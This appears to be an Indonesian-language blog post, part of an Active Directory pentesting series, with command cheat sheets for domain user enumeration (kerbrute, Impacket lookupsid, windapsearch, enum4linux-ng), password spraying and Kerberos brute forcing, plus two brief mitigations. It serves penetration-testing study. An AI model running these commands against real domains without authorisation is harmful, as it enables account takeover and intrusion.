Post

Part 2 - User Enumeration

Tujuan

  • Get a foothold user

Prasyarat

  • Memiliki akses ke RPC, atau
  • Memiliki wordlist username

Tools

  • Kerbrute
  • Impacket
  • windapsearch

Tahap eksploitasi

User Enumeration

1
2
3
4
5
6
7
8
9
10
11
# kerbrute
➜ kerbrute userenum -d <domain> --dc <ip-dc> userslist.txt

# impacket, jika SMB/RPC bisa diakses
➜ lookupsid.py anonymous@<ip-dc>

# windapsearch
➜ windapsearch -m user -d <domain> --dc <ip-dc>

# enum4linux-ng
➜ enum4linux-ng -A <ip-dc>

Password Spray

1
2
# kerbrute
➜ kerbrute passwordspray -d <domain> --dc <ip-dc> domain_users.txt <password>

Brute User

1
2
# kerbrute
➜ kerbrute bruteuser -d <domain> passwords.txt <user>

Brute Force

Langkah-langkah:

  1. Buat kombinasi username dan password dengan format username:password.
  2. Jalankan perintah berikut:
1
cat combos.lst | kerbrute -d <domain> bruteforce -

Mitigasi

  • Jangan berikan akses anonymous pada RPC.
  • Terapkan kebijakan password yang kuat pada setiap pengguna.

Referensi

This post is licensed under CC BY 4.0 by the author.